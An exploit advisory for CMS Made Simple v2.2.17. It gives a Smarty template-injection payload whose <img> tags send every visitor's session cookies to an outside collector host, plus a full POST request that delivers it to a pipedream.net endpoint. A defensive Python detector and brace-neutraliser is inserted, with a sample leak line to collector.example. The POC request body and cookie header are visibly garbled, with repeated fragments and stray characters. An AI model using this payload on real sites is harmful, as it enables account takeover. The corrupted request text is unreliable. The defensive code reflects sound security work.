CMS Made Simple v2.2.17 - Session Hijacking via Server-Side Template Injection (SSTI)
# Exploit Title: CMS Made Simple v2.2.17 - Session Hijacking via Server-Side Template Injection (SSTI)
# Application: CMS Made Simple
# Version: v2.2.17
# Bugs: SSTI
# Technology: PHP
# Vendor URL: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
# Date Found: 13-07-2023
# Author: Mirabbas Ağalarov
# Tested On: Linux
2. Technical Details (POC)
====================================================
Steps:
1. Log in to the test user account (a low-privileged editor is enough).
2. Go to Content Manager.
3. Add New Content.
4. Set the content_en field to the following. The first four lines are probes that confirm Smarty evaluates the content; the <img> tags make each visitor's browser send the server-rendered cookie values to the attacker's host:
'''
{$smarty.version}
{{7*7}}
{$smarty.now}
{$smarty.template}
<img src="https://your-server/{$smarty.cookies.CMSSESSID852a6e69ca02}" />
<img src="https://your-server/{$smarty.cookies.34A3083B62A2255EFA0BC6B5B43333335D226264C2C1}" />
<img src="https://your-server/{$smarty.cookies.__c}" />
'''
5. Whenever any user visits the page, the attacker receives all of that user's cookies, including the session cookie.
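The leak works because `{$smarty.cookies.NAME}` is expanded on the server from `$_COOKIE`, so the HttpOnly flag gives no protection; the fix is to keep untrusted content out of the Smarty compiler. The Python below is an added defensive example, not part of the advisory or of CMS Made Simple: it decodes a constructed content_en value the way PHP fills `$_POST`, flags Smarty syntax that reaches sensitive reserved variables, and shows a brace-neutralising transform using Smarty's `{ldelim}`/`{rdelim}` tags (assumed here to be applied before the content is handed to Smarty as a template).

```python
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Constructed sample of a form-encoded content_en field (not the advisory's
# real payload): two probes plus an <img> that leaks the session cookie.
RAW_CONTENT_EN = (
    "%3CP%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+"
    "%3CIMG+SRC%3D%22https%3A%2F%2Fcollector.example%2F"
    "%7B%24smarty.cookies.CMSSESSIDdeadbeef%7D%22+%2F%3E%3C%2FP%3E"
)

# Smarty reserved variables that expose request state to the template;
# $smarty.cookies is what makes the session hijack above possible.
SENSITIVE = {"cookies", "server", "session", "request", "env", "get", "post"}

TAG = re.compile(r"\{\{?[^{}]*\}\}?")                          # {...} or {{...}}
SMARTY_VAR = re.compile(r"\$\s*smarty\s*\.\s*([a-z_]+)", re.I)  # $smarty.<name>
MATH_PROBE = re.compile(r"\{\{\s*\d+\s*[*+/-]\s*\d+\s*\}\}")   # e.g. {{7*7}}

def decode_field(raw: str) -> str:
    """Decode a form-encoded field exactly as PHP does for $_POST."""
    return unquote_plus(raw)

def find_ssti(content: str) -> List[Tuple[str, str]]:
    """Return (severity, tag) for every Smarty tag found in user content."""
    findings = []
    for tag in TAG.findall(content):
        var = SMARTY_VAR.search(tag)
        if var and var.group(1).lower() in SENSITIVE:
            findings.append(("high", tag))     # reads cookies/server state
        elif var or MATH_PROBE.fullmatch(tag):
            findings.append(("medium", tag))   # version/now/math probes
    return findings

def neutralise(content: str) -> str:
    """Swap braces for {ldelim}/{rdelim} in a single pass so Smarty prints
    them literally instead of compiling user-supplied tags."""
    return re.sub(r"[{}]",
                  lambda m: "{ldelim}" if m.group() == "{" else "{rdelim}",
                  content)

if __name__ == "__main__":
    decoded = decode_field(RAW_CONTENT_EN)
    for severity, tag in find_ssti(decoded):
        print(severity, tag)
    print(neutralise(decoded))
```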
PAYLOAD: the URL-encoded form of the template block above, submitted as the content_en field of the request below.
POC request:
POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&__c=1c2c31a1c1bff4819cd&m1_content_id=81&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 988
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
cookie: cmsSessID852A6E69CA02=BQ83G023OTKN4S745ACDNVBNU4; 34A3083B62A2225EFA0BC6B5B43335D2226264C2C1=1E91865AC5C59E34F8DC1DDB6FD 168A61246751D%3A%3AEYJ1AWQIOJESINVZZXJUYW1LIJOIYWRTAW4ILCJLZMZFDWLKI joylcjlzmzfdxnlcm5hbwuioij0zxn0iiiwiagfzaci6iiqyesqxmcrdqlwveiynepswmhjhkq29lcwplzxxxxglzxgyplzgypldplzrdlgldldldrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdrdniduo2c3vxmud1vndndndndndndndncrrd; __C=1C2C31A1C1BFF4819CD
Connection: close
MACT=CMSCONTENTMANAGER%2CM1_%2CADMIN_EDITCONTENT%2C0__C=1C2C31A1BFF4819CDM1_CONTENT_ID=81M1_ACTIVE_TAB=M1_CONTENT_TY pe=contentTitle=testContent_en=%3CP%3E%7b%24Smarty.version%7D+%7b%7B7*7%7D%7D+%7B%24SMARTY.NOW%7D+%7D+%7B%24SMARTY. -emplate. -emplate %7D+%3CIMG+SRC%3D%22HTTPS%3A%2F%2FEN3UW3QY2E0ZS.X.X.PIPEDREAM.NET%2F%7B%24SMARTY.COOKIES.CMARTY.CMSSSESSID8522A6E6E6E69CA02%7D%7D%22+%22+%2F%2F% 3E+%3CIMG+SRC%3D%22Https%3A%2F%2FEN3UW3QY2E0ZS.X.X.PIPEDREAM.NET%2F%7B%24SMARTY.COOKIES.COOKIES.34A3083B622A22A22A22A22A22A22A22A22A25EFAA25EFAESMARTY 264C2C1%7D%22+%2F%3E+%3CIMG+SRC%3D%22Https%3A%2F%2FEN3UW3QY2E0ZS.X.PIPEDREAM.PIPEDREAM.NET%2F%2F%7B%7B%24SMARTY.COOKIES.__ COBIES.__ C%7D%22+%22+%2F%2F%2F%2F%2F%2F%2F%2F% 3E%3C%2FP%3emenutext=testParent_id=-1ShowinMenu=0showinmenu=1titLeatTribute=accessKey=tabindex=tabindex=target=---元数据=pegaged ata=design_id=2template_id=10Alias=testActive=0Active=1Secure=0cachable=0cachable=0cachable=1image=1image=thumbnail=extrabnail=extrabnail=extra1=extra2=extra 3=wandChildren=0wantsChildren=1 Searchable=0searchable=1disable_wyswyg=0 ownererid=1additional_editors=m1_ajax=1m1_apply=1
POC VIDEO: